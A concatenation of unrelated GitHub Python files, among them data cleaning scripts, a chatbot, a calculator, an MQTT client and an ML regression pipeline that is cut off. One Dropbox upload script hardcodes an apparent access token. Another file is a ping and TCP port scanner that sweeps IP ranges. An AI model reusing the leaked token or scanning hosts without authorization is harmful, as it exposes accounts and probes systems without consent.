+{"seq_id":"70486599404","text":"import os \nimport csv \nimport time\nimport pandas as pd \nimport numpy as np \n\"\"\"\ndesc1: 数据清洗脚本\ndesc: 数据去重,选取具有代表性的pio_type,原始数据是从数据库中直接拉去下来的数据,同类型的数据出现频率太高\n 这个脚本的作用是清洗数据,选择部分数据作为训练集或者测试集\ndemand: 数据是csv格式的文件,最好在csv文件中已经去重\n\"\"\"\ndef load_data():\n # 设置读取文件路径和存储文件路径\n file_path = \"\"\n result_path = \"\"\n if os.path.exists(file_path) and os.path.exists(result_path):\n print(\"file exist, the process can continue\")\n else:\n print(\"file not exist\")\n return\n raw_file = pd.read_csv(file_path, engine=\"python\")\n result_file = open(result_path, mode='a', newline='')\n\n # 交互性命令行设置,方便设置抽取参数sampel_num\n m, n = raw_file.shape\n result_writer = csv.writer(result_file)\n sampel_num = input(\"how many data do you want extract from the origin file :\")\n if sampel_num == None:\n print(\"we set a default number for you, number is 10000\")\n sampel_num = 10000\n sampel_num = int(sampel_num)\n if sampel_num >= m:\n print(\"invalid number\")\n keyIn = input(\"make sure you have define how many data do you want, continue(yes/no?)\")\n if keyIn != \"yes\":\n return\n print(\"the process start working\")\n \n # 核心代码,进行数据数据\n begin_time = time.clock()\n print(0, raw_file.loc[0][1])\n print(1, raw_file.loc[1][1])\n for i in range(m):\n # k = raw_file.loc[i][1]\n # print(k, type(k))\n # 注意这里raw_file.loc[i][1]的type是str类型,只比较字符串的第一个字符来判断是否选取这个样本\n if i >= sampel_num:\n break\n if i == 0 or raw_file.loc[i][1][0] != raw_file.loc[i-1][1][0]:\n # print(raw_file.loc[i][1])\n kk = raw_file.loc[i][1]\n print(kk)\n result_writer.writerow([kk])\n print(\"data storing...\")\n result_file.close()\n end_time = time.clock()\n print(\"time consuming of the process:\", end_time-begin_time, \"s\")\n\ndef main():\n load_data()\n\nif __name__ == \"__main__\":\n main()","repo_name":"dddfgkl/csvAndExcel","sub_path":"csvAnalyse/extract_data.py","file_name":"extract_data.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"39581575050","text":"# Regex без использования Google Search (Hors Arev :D)\nimport re\npattern = '^([0-9a-zA-Z_\\.-]+)\\@([0-9a-zA-Z_\\.-]+)\\.([ru | com | io | net | ai]{2,6})$'\nstring = 'example@mail.ru'\npattern2 = '^([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})\\:([0-9a-zA-Z]{4})$'\nstring2 = '2001:0DB8:AC10:FE01'\nresult = re.findall(pattern, string)\nresult2 = re.findall(pattern2, string2)\nif len(result) > 0:\n\tif len(result[0]) == 3:\n\t\tprint('Valid E-mail :)')\n\telse:\n\t\tprint('No Valid E-mail :)')\nelse:\n\tprint('No Valid E-mail :)')\nif len(result2) > 0:\n\tif len(result2[0]) == 4:\n\t\tprint('Valid IPV6 :)')\n\telse:\n\t\tprint('No Valid IPV6 :)')\nelse:\n\tprint('No Valid IPV6 :)')","repo_name":"wizardcapone/Basic-IT-Center-Python","sub_path":"Regex/regex.py","file_name":"regex.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"45587018713","text":"from typing import Optional\nfrom core.db import Transactional\nfrom sqlalchemy import select, and_\n\nfrom core.db import session\nfrom core.utils import LanguageManager\nfrom ..models import ProductTax\nclass ProductTaxService:\n def __init__(self):\n ...\n\n @Transactional()\n async def create_product_tax(\n self,\n product_id: int,\n tax_id: int,\n tax: float,\n tax_type: str,\n ) -> str:\n pass\n \n async def delete(\n self,\n ids: list,\n flag: str,\n accept_language: Optional[str],\n language_manager: LanguageManager,\n ) -> dict:\n print (\"~~~~~~~~~~~~~~~~~~~~~~~ product taxes delete request\")\n result = await session.execute(\n select(ProductTax).where(ProductTax.product_id.in_(ids))\n )\n product_taxes = result.scalars().all()\n if not product_taxes:\n print (\"Product taxes not found\")\n else:\n for product_tax in product_taxes:\n await session.delete(product_tax)\n if flag!=\"direct\":\n await session.commit()\n print (\"product taxes delete success\")\n return { \"success\": True, \"message\": language_manager.get_message(accept_language=accept_language, key=\"product_taxes_deleted\") }","repo_name":"techguru0/easyric-api-beta","sub_path":"app/product_tax/services/product_tax.py","file_name":"product_tax.py","file_ext":"py","file_size_in_byte":1291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"21816704671","text":"import dropbox\r\n\r\nclass TransferData:\r\n def __init__(self, access_token):\r\n self.access_token = access_token\r\n \r\n def upload_file(self, file_from, file_to):\r\n \r\n dbx = dropbox.Dropbox(self.access_token)\r\n f = open(file_from, 'rb')\r\n print(f.read())\r\n\r\n dbx.files_upload(f.read(), file_to)\r\n\r\ndef main():\r\n access_token = 'sl.AwiGhdO02RNNjBWV_7XBYnfLPrYQYjk-VWmvgWv_rWplLZfEVTfrFm_5Z5XYpb9mw37j19wJjeXgHUVPVQRi-4tOm43ZyC-lSxw6SbCGjKy3mbzQMwG4No3nY331OCZvEj7c5Ww'\r\n transferData = TransferData(access_token)\r\n\r\n file_from = input(\"Enter the file path to transfer: \")\r\n file_to = input(\"Enter the full path to upload to dropbox: \")\r\n transferData.upload_file(file_from, file_to)\r\n\r\nmain()","repo_name":"WhiteHatJr-stud/cloudStorageErrorCode","sub_path":"cloudStorage.py","file_name":"cloudStorage.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"73463530924","text":"# 임의의 N개 숫자가 입력으로 주어집니다. N개의 수를 오름찾순으로 정렬한 다음 N개의 수중\n# 한 개의 수인 M이 주어지면 이분검색으로 M이 정렬된 상태에서 몇 번째에 있는지 구하는 프로그램을 작성하세요\n\nimport sys\n# sys.stdin = open(\"in1.txt\", \"rt\")\nn, k = map(int, input().split())\n\n\nlist1 = list(map(int, input().split()))\n\n# print(list1)\nlist1.sort()\n# print(list1)\n\n\n\nlt = 0\nrt = n\nwhile lt <= rt:\n mid = (rt + lt) // 2\n if list1[mid] == k:\n print(mid+1)\n break;\n elif list1[mid] > k:\n rt = mid - 1\n else:\n lt = mid + 1","repo_name":"genizara/python_algorithm","sub_path":"inflearn01/섹션 4/1. 이분검색/AA.py","file_name":"AA.py","file_ext":"py","file_size_in_byte":635,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"39065686757","text":"#Functions can Accept Arguments\n#Put the argument's name between the parentheses.\ndef search4vowels(word):\n \"\"\"Display any vowels found in an asked-for word.\"\"\"\n vowels = set('aeiou')\n #This line isn't needed anymore.\n #word = input('Provide a word to search for vowels: ')\n#The call to the \"input\" function is gone(as we don't need that line of code anymore).\n\n found = vowels.intersection(set(word))\n for vowel in found:\n print(vowel)\n\nsearch4vowels('amitpratapsingh')\n","repo_name":"AmitAps/python","sub_path":"headfirstpy/ch4/functakearg.py","file_name":"functakearg.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"30131080496","text":"from django.urls import path\nfrom .views import index, sith_page, recruit_page, questions_page, siths, make_hand_of_shadow, hand_amount, more_than_one_hand\n\nurlpatterns = [\n path('', index, name='index'),\n path('sith', siths, name='sith'),\n path('recruit', recruit_page, name='recruit'),\n path('questions/', questions_page, name='questions'),\n path('sith/', sith_page, name='sith_page'),\n path('make_hand_of_shadow//', make_hand_of_shadow, name='make_hand_of_shadow'),\n path('hand_amount', hand_amount, name='hand_amount'),\n path('more_than_one_hand', more_than_one_hand, name='more_than_one_hand'),\n]\n","repo_name":"rishat11/star_wars","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"71801312684","text":"import os\nimport time\nimport uuid\nimport datetime\nimport json\nfrom pprint import pprint\nimport paho.mqtt.client as mqtt\n\ndef msg_rcv(client, userdata, message):\n # print(\"Received message '\" + str(message.payload) + \"' on topic '\" + message.topic)\n try:\n data = json.loads(str(message.payload))\n print(data[\"date\"])\n except:\n print(\"A message not intended for me, ignoring... \"+ str(message.payload))\n\ndef on_log(client, userdata, level, buf):\n print(\"log: \",buf)\n\ndef main_loop():\n # mosquitto_sub -h 82.165.16.151 -t UCC/mark\n client = mqtt.Client(\"bje_client_\"+ str(uuid.UUID.hex))\n client.on_message = msg_rcv\n # client.on_log = on_log\n client.connect(\"test.mosquitto.org\") # , port=1883 , keepalive=60, bind_address=\"\"\n client.loop_start()\n client.subscribe(\"test_for_anna\")\n\n while True:\n time.sleep(1)\n print(\".\")\n\nif __name__ == \"__main__\":\n main_loop()","repo_name":"kittylyst/helloku-world","sub_path":"rcv.py","file_name":"rcv.py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"26776819969","text":"import os\n\n# a little helper function for getting all dettected marker ids\n# from the reference image markers\ndef which(x, values):\n indices = []\n for ii in list(values):\n if ii in x:\n indices.append(list(x).index(ii))\n return indices\n\n\ndef get_camera_path(camera_name):\n\n stream = os.popen('v4l2-ctl --list-devices')\n output = stream.read()\n lines = output.split(\"\\n\")\n for i, line in enumerate(lines):\n if camera_name in line:\n return lines[i+1].strip()\n \n return \"\"","repo_name":"vietanhdev/paper_stream","sub_path":"libs/utils/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"73437640364","text":"import tkinter as tk\n\ndef calculate():\n num1 = float(entry_num1.get())\n num2 = float(entry_num2.get())\n operation = operation_var.get()\n \n if operation == \"Add\":\n result.set(num1 + num2)\n elif operation == \"Subtract\":\n result.set(num1 - num2)\n elif operation == \"Multiply\":\n result.set(num1 * num2)\n elif operation == \"Divide\":\n if num2 == 0:\n result.set(\"Cannot divide by zero\")\n else:\n result.set(num1 / num2)\n else:\n result.set(\"Please select a operation\")\n\n# Create the main window\nroot = tk.Tk()\nroot.title(\"Calculator\")\n\n# Create input fields and labels\nentry_num1 = tk.Entry(root)\nentry_num2 = tk.Entry(root)\nresult = tk.StringVar()\noperation_var = tk.StringVar()\noperation_var.set(\"Select Operation\")\n\nlabel_num1 = tk.Label(root, text=\"Enter first number:\")\nlabel_num2 = tk.Label(root, text=\"Enter second number:\")\nlabel_result = tk.Label(root, text=\"Result:\")\nlabel_operation = tk.Label(root, text=\"Select operation:\")\n\n# Create operation options\noperation_options = [\"Add\", \"Subtract\", \"Multiply\", \"Divide\"]\noption_menu = tk.OptionMenu(root, operation_var, *operation_options)\n\n# Create calculate button\ncalculate_button = tk.Button(root, text=\"Calculate\", command=calculate)\n\n# Grid layout\nlabel_num1.grid(row=0, column=0)\nentry_num1.grid(row=0, column=1)\nlabel_num2.grid(row=1, column=0)\nentry_num2.grid(row=1, column=1)\nlabel_operation.grid(row=2, column=0)\noption_menu.grid(row=2, column=1)\ncalculate_button.grid(row=3, column=0, columnspan=2)\nlabel_result.grid(row=4, column=0)\ntk.Label(root, textvariable=result).grid(row=4, column=1)\n\n# Start the GUI event loop\nroot.mainloop()\n","repo_name":"deepa-48/Calculator","sub_path":"simple_calculator.py","file_name":"simple_calculator.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"41366390049","text":"# -*- coding:utf8 -*-\n\nimport os\nimport time\nimport json\nimport argparse\nfrom concurrent.futures import ThreadPoolExecutor, ProcessPoolExecutor\n\nfrom utils import check_ping, parse_ip, check_port\n\n\nclass HostScanner(object):\n\n def __init__(self, args):\n self.m = args.m\n self.f = args.f\n self.file_name = args.w\n self.cost_print = args.v\n self.concurrent_num = args.n\n self.ip = [ip for ip in parse_ip(args.ip)] if args.f == 'ping' else args.ip\n\n def run_ping(self, ip):\n res = check_ping(ip)\n return {'ip': ip, 'can_ping': res}\n\n def run_tcp_port(self, port):\n res = check_port(self.ip, port)\n return {'ip': self.ip, 'port': port, 'is_open': res}\n\n def run(self):\n begin = int(time.time())\n Executer = ThreadPoolExecutor if args.m == 'thread' else ProcessPoolExecutor\n with Executer(self.concurrent_num) as pool:\n if self.f == 'ping':\n result = pool.map(self.run_ping, self.ip)\n else:\n result = pool.map(self.run_tcp_port, [port for port in range(65535 + 1)])\n end = int(time.time())\n\n if self.cost_print:\n print('cost time:%s' % (end - begin))\n data = list()\n for d in result:\n data.append(d)\n\n if self.file_name:\n with open(self.file_name, 'w') as f:\n f.write(json.dumps(data))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('-m', type=str, choices=['proc', 'thread'], default='proc', help='多线程or多进程')\n parser.add_argument('-n', type=int, help='进程或线程数量')\n parser.add_argument('-f', choices=['tcp', 'ping'], default='ping', help='执行方式')\n parser.add_argument('-ip', metavar='ip', required=True, help='ip eg. 192.0.0.1 192.0.0.1-192.0.0.100')\n parser.add_argument('-w', metavar='filename', help='扫描结果保存文件')\n parser.add_argument('-v', action='store_true', help='打印扫描器运行耗时')\n args = parser.parse_args()\n host_scanner = HostScanner(args)\n host_scanner.run()\n","repo_name":"Masonnn/ApiTest","sub_path":"pythonYing/week03/homework/pmap02/app2.py","file_name":"app2.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"16108182961","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Oct 23 12:38:13 2016\n\n@author: apple\n\"\"\"\nimport numpy as np\nimport time\nfrom numba import jit, f8, njit\nimport C_bisect as Cbi\n\ndef root_func(x,aa,kk):\n return x**4 + kk*x**2 + aa*x - 3\n \na = np.random.rand(50000)\nkk = np.random.randint(-2,50,size=a.shape).astype(np.float64)\nres = np.empty(a.size)\nres1 = np.empty(a.size)\nres2 = np.empty(a.size)\n\n\n# [0] python bisection\nt1 = time.time()\ndef python_bisect(a, b, aa, kk, tol, mxiter):\n its = 0\n fa = root_func(a, aa, kk)\n fb = root_func(b, aa, kk)\n if abs(fa) < tol:\n return a\n elif abs(fb) < tol:\n return b\n c = (a+b)/2.\n fc = root_func(c, aa, kk)\n while abs(fc)>tol and itstol and its 0.75:\n for intent in intents['intents']:\n if tag == intent[\"tag\"]:\n print(f\"{bot_name}: {(random.choice(intent['responses']))}\")\n else:\n print(f\"{bot_name}: Não entendi...\")","repo_name":"GO0108/sabia","sub_path":"Criando um ChatBot/Chatbot BoW/chat.py","file_name":"chat.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"6038197722","text":"import urllib.parse\nfrom typing import Callable\n\nimport web_framework.server_side.infastructure.ids_manager as ids_manager\nfrom APIs.TalpiotAPIs.Gitlab.gitlab_file_tree import GitlabFileTree\nfrom web_framework.server_side.infastructure.constants import *\nfrom web_framework.server_side.infastructure.ui_component import UIComponent\n\n\nclass FileTree(UIComponent):\n def __init__(self, action: Callable = None, size=SIZE_MEDIUM, start_folder = 'bot_features', branch = 'development'):\n super().__init__(size=size)\n self.__action = None\n self.set_action(action)\n self.__files = GitlabFileTree.objects(name=start_folder, branch = branch).first()\n self.__files = self.__files.to_json() if self.__files is not None else {}\n\n def set_action(self, action: Callable):\n if action:\n func_id = ids_manager.gen_action_id(lambda json: action(json['url']))\n self.__action = self.method_to_url(func_id)\n\n def render(self):\n return {\n JSON_TYPE: 'FileTree',\n JSON_ID: self.id,\n JSON_ACTION: self.__action,\n JSON_SIZE: self.size,\n JSON_FILES: self.__files\n }\n","repo_name":"roeinath/Magdad","sub_path":"web_framework/server_side/infastructure/components/file_tree.py","file_name":"file_tree.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"72614305964","text":"#2244. Minimum Rounds to Complete All Tasks\ndef minimumRounds(self, tasks: list[int]) -> int:\n tasks.sort()\n fin = 0\n for i in range(0,len(tasks)):\n for j in range(i+1,len(tasks)):\n if tasks[j] != tasks[i]:\n break\n n = j-i-1\n print(n,tasks[i],tasks[j])\n if n%3 == 0:\n fin += n/3\n elif n > 2:\n fin += fun(n)\n elif n == 2:\n fin += 1\n elif n < 2 :\n return -1\n return fin\n\n\"\"\" amount = []\n fin = 0\n for i in r:\n amount.append(tasks.count(i))\n print(amount)\n for l in amount:\n if l < 2:\n return -1\n elif l%3 == 0:\n fin += l/3\n elif l > 2:\n fin += fun(l)\n elif l == 2:\n fin += 1\n return int(fin)\n\"\"\"\ndef fun(n):\n numb = int(n/3)\n for i in range(numb,-1,-1):\n if (n-i*3) %2 == 0:\n return i + (n-i*3)/2\n\n\n \n\nprint(minimumRounds(5,[2,2,3,3,2,4,4,4,4,4]))","repo_name":"leonado10000/CP","sub_path":"leetcode/2244. Minimum Rounds to Complete All Tas.py","file_name":"2244. Minimum Rounds to Complete All Tas.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
+{"seq_id":"3268277726","text":"from tensorflow import keras\nfrom tensorflow.keras import backend as K\n\n__all__ = ['WeightedSum']\n\n\nclass WeightedSum(keras.layers.Layer):\n r\"\"\"Sum the layers with trainable weights. All the layers should have the same shape and mask.\n\n h = \\gamma * \\sum_{i=0}^L w_i h_i\n\n s will be normalized with softmax.\n \"\"\"\n\n def __init__(self,\n use_scaling=True,\n **kwargs):\n \"\"\"Initialize the layer.\n\n :param use_scaling: Whether to use the scaling term `gamma`.\n :param kwargs:\n \"\"\"\n self.supports_masking = True\n self.use_scaling = use_scaling\n self.gamma, self.w = None, None\n super(WeightedSum, self).__init__(**kwargs)\n\n def get_config(self):\n config = {\n 'use_scaling': self.use_scaling,\n }\n base_config = super(WeightedSum, self).get_config()\n return dict(list(base_config.items()) + list(config.items()))\n\n def build(self, input_shape):\n if isinstance(input_shape, list):\n layer_num = len(input_shape)\n else:\n layer_num = 1\n if self.use_scaling:\n self.gamma = self.add_weight(shape=(1,),\n initializer='ones',\n name='%s_gamma' % self.name)\n self.w = self.add_weight(shape=(layer_num,),\n initializer='ones',\n name='%s_w' % self.name)\n super(WeightedSum, self).build(input_shape)\n\n def compute_output_shape(self, input_shape):\n if isinstance(input_shape, list):\n return input_shape[0]\n return input_shape\n\n def compute_mask(self, inputs, mask=None):\n if isinstance(mask, list):\n return mask[0]\n return mask\n\n def call(self, inputs, mask=None, **kwargs):\n e = K.exp(self.w - K.max(self.w))\n w = e / (K.sum(e) + K.epsilon())\n if not isinstance(inputs, list):\n inputs = [inputs]\n summed = w[0] * inputs[0]\n for i in range(1, len(inputs)):\n summed += w[i] * inputs[i]\n if self.use_scaling:\n summed *= self.gamma\n return summed\n","repo_name":"CyberZHG/keras-bi-lm","sub_path":"keras_bi_lm/weighted_sum.py","file_name":"weighted_sum.py","file_ext":"py","file_size_in_byte":2220,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"19"}
+{"seq_id":"72661126123","text":"import os, time, math\nimport random\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\n\nfrom .data_factory import DataFactory\nfrom .log_factory import LogFactory\nfrom .Normalizer import UnitGaussianNormalizer\nfrom .models.nnet_model import MyNNet\nfrom .utils import *\nfrom .bayes_optimization import Bayes_Optimization\nfrom sklearn.metrics import r2_score\nfrom sklearn.linear_model import LassoCV\nfrom bayes_opt import BayesianOptimization\n\nimport matplotlib.pyplot as plt\n\n\nclass CoreComponent:\n def __init__(self, model='lasso', imputer='knn', outlier='zscore', pca='pca', device='cuda'):\n self.root_path = os.path.abspath(os.curdir)\n self.data_path = os.path.join(self.root_path, 'data')\n print(\"The root path of our project: \", self.root_path)\n self.imputer = imputer\n self.outlier = outlier\n self.pca = pca\n self.device = device # choose with your preference\n\n self.model_name = 'lasso' if model is None else model # choose with your preference\n if self.model_name == 'lasso':\n self.train_model = LassoCV\n elif self.model_name == 'nnet':\n self.train_model = MyNNet(self)\n elif self.model_name == 'ridge':\n from sklearn.linear_model import RidgeCV\n self.train_model = RidgeCV\n else:\n self.train_model = None\n\n self.log_factory = LogFactory(self, log_to_disk=False)\n self.data_factory = DataFactory(self)\n self.full_normalizer = UnitGaussianNormalizer(self)\n self.y_normalizer = UnitGaussianNormalizer(self)\n self.bayes_optimization = Bayes_Optimization(self)\n\n self.full_X = None\n self.full_Y = None\n self.validation_X = None\n\n self.k_fold = 10\n self.train_percent = 0.99\n\n self.initialized = False\n\n def initialization(self):\n random.seed(0)\n self.log_factory.initialization()\n self.log_factory.InfoLog(sentences=\"Log Factory fully created\")\n\n self.data_factory.initialization()\n\n # 1. read data\n self.full_X = self.data_factory.read_dataset(os.path.join(self.data_path, \"X_train.csv\"))\n self.full_Y = self.data_factory.read_dataset(os.path.join(self.data_path, \"y_train.csv\"))\n self.validation_X = self.data_factory.read_dataset(os.path.join(self.data_path, \"X_test.csv\"))\n\n # 2. process X files together\n full_X_shape_0 = self.full_X.shape[0]\n validation_X_shape_0 = self.validation_X.shape[0]\n full_validation_X = np.concatenate((self.full_X, self.validation_X), axis=0)\n\n full_validation_X, self.full_Y = self.data_factory.process_dataset(full_validation_X, self.full_Y,\n impute_method=self.imputer,\n outlier_method=self.outlier)\n self.full_normalizer.initialization(full_validation_X)\n full_validation_X = self.full_normalizer.encode(full_validation_X)\n full_X_shape_0 = len(self.full_Y)\n full_validation_X, self.full_Y = self.data_factory.feature_selection(full_validation_X, self.full_Y,\n method=self.pca, rows_X=full_X_shape_0)\n self.log_factory.InfoLog(\"After feature selection, the shape of X = {}\".format(full_validation_X.shape))\n self.full_X = full_validation_X[:full_X_shape_0, :]\n self.validation_X = full_validation_X[-validation_X_shape_0:, :]\n\n # self.y_normalizer.initialization(self.full_Y)\n # self.full_Y = self.y_normalizer.encode(self.full_Y)\n\n # 3. 
transfer numpy data to Tensor data\n self.log_factory.InfoLog(\"Read data completed from X_train.csv, with shape as {}\".format(self.full_X.shape))\n self.full_X = torch.autograd.Variable(torch.from_numpy(np.array(self.full_X)).float()).to(self.device)\n # self.full_Y = self.data_factory.process_dataset(self.full_Y) # Y data cannot be processed!\n self.log_factory.InfoLog(\"Read data completed from y_train.csv, with shape as {}\".format(self.full_Y.shape))\n self.full_Y = torch.autograd.Variable(\n torch.from_numpy(np.array(self.full_Y).reshape(self.full_Y.shape[0], 1)).float()).to(self.device)\n\n self.log_factory.InfoLog(\n \"Read data completed from X_test.csv, with shape as {}\".format(self.validation_X.shape))\n self.validation_X = torch.autograd.Variable(torch.from_numpy(np.array(self.validation_X)).float()).to(\n self.device)\n\n self.initialized = True\n \n\n def run(self):\n if self.model_name == \"lasso\":\n full_X = self.full_X.cpu().numpy()\n full_Y = self.full_Y.cpu().numpy()\n reg = self.train_model(n_alphas=100, cv=self.k_fold, eps=1e-3, max_iter=5000, random_state=0,\n precompute=False).fit(full_X, full_Y)\n predicted_y_validate = reg.predict(self.validation_X.cpu().numpy())\n predicted_y_full = reg.predict(full_X)\n self.dump_validated_y(predicted_y_validate)\n self.log_factory.InfoLog(\"all score = {}\".format(r2_score(full_Y, predicted_y_full)))\n elif self.model_name == 'ridge':\n full_X = self.full_X.cpu().numpy()\n full_Y = self.full_Y.cpu().numpy()\n \"\"\"\n params: cv=k-fold //为None时使用loocv来验证,但是score会用mse而不是r2score\n alphas=[...] //里面是我们备选的所有正则化参数\n fit_intercept=True //default就是True,指在拟合时是否需要截距(当然需要)\n \"\"\"\n reg = self.train_model(alphas=[1e-5, 1e-4, 1e-3, 1e-2, 1e-1, 1, 10.0], cv=self.k_fold).fit(full_X, full_Y)\n predicted_y_validate = reg.predict(self.validation_X.cpu().numpy())\n predicted_y_full = reg.predict(full_X)\n self.dump_validated_y(predicted_y_validate.squeeze(1))\n self.log_factory.InfoLog(\"all score = {}\".format(r2_score(full_Y, predicted_y_full)))\n elif self.model_name == \"mlp\":\n from sklearn.ensemble import ExtraTreesRegressor\n from sklearn.model_selection import RandomizedSearchCV, GridSearchCV, cross_val_score\n #from sklearn.neural_network import MLPRegressor\n\n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n\n ###贝叶斯调参 \n #黑盒函数 \n def black_box_function(n_estimators, min_samples_split, max_features, max_depth, min_samples_leaf):\n val = cross_val_score(\n ExtraTreesRegressor(n_estimators = int(n_estimators),\n max_features = int(max_features),\n max_depth = int(max_depth),\n min_samples_split = int(min_samples_split),\n min_samples_leaf = int(min_samples_leaf),\n random_state = 2,\n bootstrap=True\n ),\n train_X, train_Y,scoring='r2', cv=5, n_jobs=-1\n ).mean()\n return val #max_features = max_features, # float\n \n #定义域\n pbounds= {'n_estimators': (500, 2000),\n 'max_features': (1, self.full_X.shape[1]),\n 'max_depth': (5, 150),\n 'min_samples_split': (2, 30),\n 'min_samples_leaf':(1, 20)}\n #'bootstrap': [True, False]\n #实例化对象\n optimizer = BayesianOptimization(f= black_box_function,\n pbounds= pbounds,\n verbose= 2, # verbose = 1 prints only when a maximum is observed, verbose = 0 is silent\n random_state= 1,\n )\n #确定迭代次数\n 
optimizer.maximize(init_points= 12, #执行随机搜索的步数\n n_iter= 100, #执行贝叶斯优化的步数\n )\n #输出最优结果\n print(optimizer.max)\n n_es=optimizer.max['params']['n_estimators']\n max_dep=optimizer.max['params']['max_depth']\n max_fea=optimizer.max['params']['max_features']\n min_s_l=optimizer.max['params']['min_samples_leaf']\n min_s_s=optimizer.max['params']['min_samples_split']\n \n # extra trees regression\n extra_tree = ExtraTreesRegressor(n_estimators=int(n_es),max_depth=int(max_dep), max_features=int(max_fea),\n min_samples_leaf=int(min_s_l), min_samples_split=int(min_s_s), n_jobs=-1,bootstrap=True)\n extra_tree.fit(train_X, train_Y)\n extra_pred = extra_tree.predict(val_X)\n\n self.log_factory.InfoLog(\"The score of extra_tree for validation={}\".format(r2_score(val_Y, extra_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': extra_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(extra_tree.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"adaboost\":\n from sklearn import ensemble \n from sklearn.tree import DecisionTreeRegressor \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n print('Bayes_Optimization(adaboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s=self.bayes_optimization.Bayes_opt_Adaboost(train_X = train_X, train_Y = train_Y) \n Adaboost = ensemble.AdaBoostRegressor(\n DecisionTreeRegressor( max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s,min_samples_leaf = min_s_l, random_state = 2),\n n_estimators = n_es,learning_rate = l_ra)\n \n Adaboost.fit(train_X, train_Y)\n ada_pred = Adaboost.predict(val_X)\n\n self.log_factory.InfoLog(\"The score of Adaboost for validation={}\".format(r2_score(val_Y, ada_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import pandas as pd\n df = pd.DataFrame({'id': ID,\n 'y': ada_pred})\n df.to_csv(os.path.join(self.data_path, 'prediction.csv'), index=False)\n self.dump_validated_y(Adaboost.predict(self.validation_X.cpu().numpy()))\n \n elif self.model_name == \"Gboost\":\n from sklearn import ensemble \n model_GradientBoostingRegressor = ensemble.GradientBoostingRegressor()\n \n row_idx = [i for i in range(self.full_X.shape[0])]\n random.shuffle(row_idx)\n train_X = self.full_X[0:math.floor(len(row_idx) * self.train_percent), ...].cpu().numpy()\n val_X = self.full_X[train_X.shape[0]:, ...].cpu().numpy()\n train_Y = self.full_Y[0:train_X.shape[0], ...].cpu().numpy()\n val_Y = self.full_Y[train_X.shape[0]:, ...].cpu().numpy()\n \n #Gboost\n print('Bayes_Optimization(Gboost)')\n n_es, l_ra, max_dep, max_fea, min_s_l, min_s_s = self.bayes_optimization.Bayes_opt_GBoost(train_X = train_X, train_Y = train_Y) \n Gboost = ensemble.GradientBoostingRegressor(max_features = max_fea, max_depth = max_dep, \n min_samples_split = min_s_s, min_samples_leaf = min_s_l, random_state = 2,\n n_estimators = n_es, learning_rate = l_ra, loss='huber')\n\n Gboost.fit(train_X, train_Y)\n gbt_pred = Gboost.predict(val_X)\n \n self.log_factory.InfoLog(\"The score of Adaboost for validation={}\".format(r2_score(val_Y, gbt_pred)))\n \n #导出正确格式的csv文件\n ID = np.array(range(len(val_X)))\n import 
